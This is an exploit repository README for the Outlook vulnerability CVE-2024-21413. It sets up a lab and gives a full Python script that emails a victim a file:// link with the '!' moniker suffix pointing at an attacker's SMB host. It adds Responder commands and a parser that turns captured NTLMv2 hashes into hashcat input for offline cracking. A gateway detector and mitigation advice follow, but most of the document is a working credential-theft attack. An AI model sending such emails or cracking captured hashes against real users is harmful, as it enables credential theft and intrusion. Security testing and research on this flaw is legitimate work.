## https://sploitus.com/exploit?id=5F6A2D1C-F3A2-50E3-AF23-AE35F65F53A8
# CVE-2024-21413 – Outlook LAB Vulnerability
## Vulnerability Description
`CVE-2024-21413` is a critical vulnerability in `Microsoft Outlook` that lets a remote attacker make the victim's machine open an attacker-supplied link from a carefully crafted email without the security prompt Outlook normally shows. The link uses the `file://` protocol to point at an attacker-controlled `SMB` share; when the victim clicks it, Windows connects to that share and authenticates to it, which exposes the user's `NTLM` credentials and can lead to unauthorized access to local files.
# Windows 10 Services Startup Script + Credentials
In the `Windows 10` lab, the password for the user `victim` is `victim`, and the password for the `hMailServer` server is `victim`.
The password for the `victim@victim.local` mailbox is `victim`, and the password for the `attacker@victim.local` mailbox is `hacker`.
Install `python3` in the `Windows 10` lab:
[Download Python3](https://www.microsoft.com/store/productId/9PNRBTZXMB4Z?ocid=pdpshare)
Open a `cmd` as administrator and install the dependencies of the startup script:
```cmd
pip install pyautogui
pip install Pillow
pip install opencv-python
```
Download the following script to the `Windows 10` lab:
```
startServicesWindows.py
```
```cmd
python3 startServicesWindows.py
```
Running it starts the mail server and `Outlook`, leaving the environment ready for the test.
# Technical Details
`Attack Vector`: The attack starts by sending the victim an email containing a `file://` link. When the link is clicked, the system tries to connect to the specified remote share and authenticates to it, which can expose the user's `NTLMv2` credentials to the attacker's server or open an attacker-controlled file.
`Impact`: Theft of `NTLM` credentials, remote code execution, or exploitation of local files. A captured `NTLMv2` response can be cracked offline or, where the environment allows it, relayed to other services that accept `NTLM` authentication.
## Requirements
- A functional `SMTP` server.
- Access to the victim computer through `Outlook`.
- Valid credentials for the email sender.
## Tools Included
This repository contains two tools designed for testing in a controlled environment:
## 1. Email Exploit Tool
A `Python` utility that automates sending emails with malicious `file://` links, to test the vulnerability in controlled environments.
## Characteristics
- Lets you configure the sender, the recipient and the sender's password.
- Embeds a link in the body of the email that uses the `file://` protocol.
- Designed to run against an `SMTP` server.
## Usage
Install the necessary dependencies:
```bash
pip install rich
```
### Run the tool:
```bash
python3 exploitSendEmailOutlook.py
```
### Provide the requested data:
- Email address of the sender `(attacker)`.
- Email address of the recipient `(victim)`.
- `Password` of the sender.
- IP of the `SMTP` server.
The email is sent automatically if the connection and the authentication succeed.
### Output Example
```plaintext
Attempting to connect to the SMTP server...
Connection established with the SMTP server.
Attempting to log in to the SMTP server...
Authentication successful.
Sending email...
Email sent successfully.
```
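The following is an added example of what the sending step looks like in code; it is not the repository's `exploitSendEmailOutlook.py`. It builds a multipart message whose HTML part carries the `file://` link to a UNC path on the attacker's host and hands it to the lab `SMTP` server with the sender's credentials. The addresses `192.168.1.50` (Responder host) and `192.168.1.10` (`hMailServer`) are assumptions for the lab; the trailing `!...` segment of the link is the moniker suffix public analyses of `CVE-2024-21413` describe, which is what makes Outlook treat the target as a plain file link and skip its warning.

```python
"""Added example (not the repository's exploitSendEmailOutlook.py): build the
CVE-2024-21413 test email and send it through an authenticated SMTP server.
Assumptions: the attacker's SMB listener (Responder) is at ATTACKER_IP and the
lab SMTP server (hMailServer) accepts SMTP AUTH on port 25; both are lab values."""
import smtplib
from email.message import EmailMessage


def build_file_link(attacker_ip: str, share: str = "share",
                    filename: str = "report.txt") -> str:
    """Return a file:// link to a UNC path on the attacker's host.

    The trailing "!..." segment is the moniker suffix described in public
    analyses of CVE-2024-21413: with it, Outlook opens the target as a file
    link and skips the warning it normally shows for remote file:// targets.
    """
    return f"file:///\\\\{attacker_ip}\\{share}\\{filename}!lab"


def build_message(sender: str, recipient: str, attacker_ip: str,
                  subject: str = "Quarterly report") -> EmailMessage:
    """Build a multipart/alternative message whose HTML part carries the link."""
    link = build_file_link(attacker_ip)
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    # Plain-text fallback first, then the HTML part that Outlook renders.
    msg.set_content(f"Please open the report: {link}")
    msg.add_alternative(
        f'<html><body><p>Please open the report: '
        f'<a href="{link}">report.txt</a></p></body></html>',
        subtype="html",
    )
    return msg


def send_message(msg: EmailMessage, smtp_host: str, username: str,
                 password: str, port: int = 25, timeout: int = 10) -> bool:
    """Authenticate as the sender and hand the message to the SMTP server.

    Raises smtplib.SMTPException on connection or authentication failure;
    returns True once the server has accepted the message.
    """
    with smtplib.SMTP(smtp_host, port, timeout=timeout) as server:
        server.ehlo()
        if server.has_extn("starttls"):  # use TLS when the server offers it
            server.starttls()
            server.ehlo()
        server.login(username, password)
        server.send_message(msg)
    return True


if __name__ == "__main__":
    # Mailbox credentials are the lab values from this README;
    # ATTACKER_IP and SMTP_HOST are assumed addresses.
    ATTACKER_IP = "192.168.1.50"
    SMTP_HOST = "192.168.1.10"
    message = build_message("attacker@victim.local", "victim@victim.local",
                            ATTACKER_IP)
    send_message(message, SMTP_HOST, "attacker@victim.local", "hacker")
    print("Email sent successfully.")
```

Start Responder before sending, otherwise the victim's SMB connection has nothing to answer it and no hash is captured.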
## 2. Responder Tool
Responder is a penetration testing tool that, among other things, acts as a `fake SMB` server and captures `NTLMv2` credentials when a system tries to authenticate to it.
### Characteristics
- Captures `NTLMv2` hashes from authentication attempts.
- Supports multiple protocols (`SMB`, `HTTP`, `FTP`, among others).
- Ideal for testing this `vulnerability`.
### Usage
Install `responder` on your attacking machine.
### On Debian/Ubuntu systems:
```bash
sudo apt update && sudo apt install responder
```
### Run Responder on your network interface:
```bash
sudo responder -I <NETWORK_INTERFACE> -v
```
Or use the script included in this repository:
```bash
python3 captureHashResponder.py
```
Keep the listener running and wait for the victim to click the malicious `file://` link that was sent.
### Output Example
```plaintext
[SMB] NTLMv2-SSP Client : 192.168.1.100
[SMB] NTLMv2-SSP Username : VICTIM-PC\user
[SMB] NTLMv2-SSP Hash : e5d5c82d3e44bf4...etc
```
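Once a hash arrives, the next step is normally to crack it offline. The following is an added example (not part of Responder or of this repository) that parses Responder's console output of the form shown above, drops malformed entries, keeps one `NTLMv2` response per user, and emits the `user::domain:challenge:NTProofStr:blob` lines that `hashcat -m 5600` expects. The sample output and the hash values in it are constructed for the example and do not come from a real capture.

```python
"""Added example (not part of Responder or this repository): turn Responder's
Client/Username/Hash lines into a hashcat -m 5600 input file.
The sample lines and hash values below are constructed for this example."""
import re
from typing import Dict, List

# Responder prints each capture as three lines: Client, Username, Hash.
_LINE = re.compile(
    r"^\[(?P<proto>[A-Z0-9]+)\]\s+NTLMv2-SSP\s+"
    r"(?P<field>Client|Username|Hash)\s*:\s*(?P<value>.+?)\s*$"
)
_HEX = re.compile(r"^[0-9a-fA-F]+$")

# Constructed sample output: the same user captured twice, then a broken line.
SAMPLE_OUTPUT = """\
[SMB] NTLMv2-SSP Client   : 192.168.1.100
[SMB] NTLMv2-SSP Username : VICTIM-PC\\victim
[SMB] NTLMv2-SSP Hash     : victim::VICTIM-PC:1122334455667788:aabbccddeeff00112233445566778899:0101000000000000c0653150de09d201
[SMB] NTLMv2-SSP Client   : 192.168.1.100
[SMB] NTLMv2-SSP Username : VICTIM-PC\\victim
[SMB] NTLMv2-SSP Hash     : victim::VICTIM-PC:8877665544332211:99887766554433221100ffeeddccbbaa:0101000000000000112233445566778899
[SMB] NTLMv2-SSP Client   : 192.168.1.101
[SMB] NTLMv2-SSP Username : VICTIM-PC\\admin
[SMB] NTLMv2-SSP Hash     : admin::VICTIM-PC:not-a-real-hash
"""


def is_ntlmv2_hash(value: str) -> bool:
    """Check the user::domain:challenge:NTProofStr:blob layout of an NTLMv2 response.

    The server challenge is 8 bytes (16 hex chars) and NTProofStr is a 16-byte
    HMAC-MD5 (32 hex chars); the blob is variable-length hex.
    """
    parts = value.split(":")
    if len(parts) != 6 or parts[1] != "":
        return False
    user, _, domain, challenge, proof, blob = parts
    return (bool(user) and bool(domain)
            and len(challenge) == 16 and _HEX.match(challenge) is not None
            and len(proof) == 32 and _HEX.match(proof) is not None
            and len(blob) >= 32 and _HEX.match(blob) is not None)


def parse_responder_output(text: str) -> List[Dict[str, str]]:
    """Group Client/Username/Hash lines into records; drop malformed hashes."""
    records: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue  # banners, "Skipping previously captured hash", etc.
        current[m["field"].lower()] = m["value"]
        current["proto"] = m["proto"]
        if m["field"] == "Hash":          # Hash is the last line of a capture
            if is_ntlmv2_hash(current["hash"]):
                records.append(current)
            current = {}
    return records


def unique_per_user(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Keep the first valid response per DOMAIN\\user; one is enough to crack."""
    seen: Dict[str, Dict[str, str]] = {}
    for rec in records:
        seen.setdefault(rec["username"].upper(), rec)
    return list(seen.values())


def to_hashcat_lines(records: List[Dict[str, str]]) -> List[str]:
    """The captured value is already in the hashcat mode 5600 format."""
    return [rec["hash"] for rec in records]


if __name__ == "__main__":
    hashes = to_hashcat_lines(unique_per_user(parse_responder_output(SAMPLE_OUTPUT)))
    with open("ntlmv2.txt", "w") as fh:
        fh.write("\n".join(hashes) + "\n")
    print(f"wrote {len(hashes)} hash(es); crack with: hashcat -m 5600 ntlmv2.txt wordlist")
```

Responder also writes each capture to its own `logs/` directory, so in practice you can feed those files to the same parser instead of the console output.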
## Mitigation Recommendations
### Blocking the `file://` Protocol
Configure your email client or mail gateway to reject links that use the `file://` protocol, and block outbound `SMB` (`TCP 445`) at the network perimeter so that an accidental click cannot reach an attacker-controlled share on the Internet.
### Disable Automatic Submission of `NTLM` Credentials
On Windows systems:
- Open the `Group Policy Editor`.
- Navigate to `Computer Configuration` > `Windows Settings` > `Security Settings` > `Local Policies` > `Security Options`.
- Set `Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers` to `Deny all`.
Test this first with `Audit all`, since denying outgoing `NTLM` breaks access to legitimate servers that do not support `Kerberos`.
### Security Update
Apply the latest security patches provided by `Microsoft`; the patch removes the bypass itself, while the settings above only limit its impact.
### Use of Strong Passwords and Multi-Factor Authentication (MFA)
This minimizes the impact if credentials are compromised: a captured `NTLMv2` response still has to be cracked offline before it can be used, and a long, random password makes that impractical.
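As an added example of the "block `file://` links" recommendation, the following check (not part of this repository or of any mail product) could run on a mail gateway or in a SOC triage script. It parses an inbound message, extracts every `href` from its HTML parts, and flags `file://` links that point at a remote host (a UNC path) rather than a local drive, with a separate test for the `!` moniker suffix used against `CVE-2024-21413`. The two sample messages are constructed for the example; the address `192.168.1.50` is a made-up attacker host.

```python
"""Added example (not part of this repository or of any mail product): flag
inbound HTML mail whose links use file:// to reach a remote UNC path.
The sample messages below are constructed for this example."""
from email import message_from_string, policy
from html.parser import HTMLParser
from typing import List


class _HrefCollector(HTMLParser):
    """Collect the href attribute of every <a> tag in an HTML body."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value:
                    self.hrefs.append(value.strip())


def is_unc_file_link(href: str) -> bool:
    """True for file:// links whose target is a remote host (UNC), not a local drive."""
    h = href.strip().lower().replace("\\", "/")
    if not h.startswith("file:"):
        return False
    target = h[len("file:"):].lstrip("/")   # drop the scheme and leading slashes
    # A UNC target looks like host/share/...; a local path looks like c:/...
    return "/" in target and not (len(target) > 1 and target[1] == ":")


def has_moniker_suffix(href: str) -> bool:
    """The '!' after the file name is the CVE-2024-21413 bypass marker."""
    filename = href.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    return "!" in filename


def find_suspicious_links(raw_message: str) -> List[str]:
    """Return the file:// UNC links found in the message's HTML parts."""
    msg = message_from_string(raw_message, policy=policy.default)
    hits: List[str] = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        collector = _HrefCollector()
        collector.feed(part.get_content())
        hits.extend(h for h in collector.hrefs if is_unc_file_link(h))
    return hits


# Constructed sample messages (not real captures).
MALICIOUS = """\
From: attacker@victim.local
To: victim@victim.local
Subject: Quarterly report
Content-Type: text/html; charset="utf-8"

<html><body><p>Open: <a href="file:///\\\\192.168.1.50\\share\\report.txt!lab">report</a></p></body></html>
"""

BENIGN = """\
From: hr@victim.local
To: victim@victim.local
Subject: Policy
Content-Type: text/html; charset="utf-8"

<html><body><a href="https://intranet.victim.local/policy">policy</a>
<a href="file:///C:/Users/Public/notes.txt">local notes</a></body></html>
"""

if __name__ == "__main__":
    for label, raw in (("malicious", MALICIOUS), ("benign", BENIGN)):
        for link in find_suspicious_links(raw):
            tag = " (moniker suffix)" if has_moniker_suffix(link) else ""
            print(f"{label}: file:// UNC link {link}{tag}")
```

Flagging on the UNC target rather than on the `!` alone is deliberate: a `file://` link to a remote share leaks `NTLM` credentials even without the `CVE-2024-21413` prompt bypass once the user confirms the dialog, so it is worth quarantining either way.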
## Explanatory video about the vulnerability on YouTube:
[Video CVE-2024-21413](LINK)
## Warning
This tool and the included scripts are for educational purposes only and for testing in controlled environments with explicit permission. Misuse of these tools for malicious activities is `illegal` and subject to severe legal penalties.
## License
This project is distributed under the `MIT` License. See the `LICENSE` file for details.
## Contact
If you have questions or would like to collaborate, do not hesitate to contact me:
Author: `d1se0`
Mail: `ciberseguridad12345@gmail.com`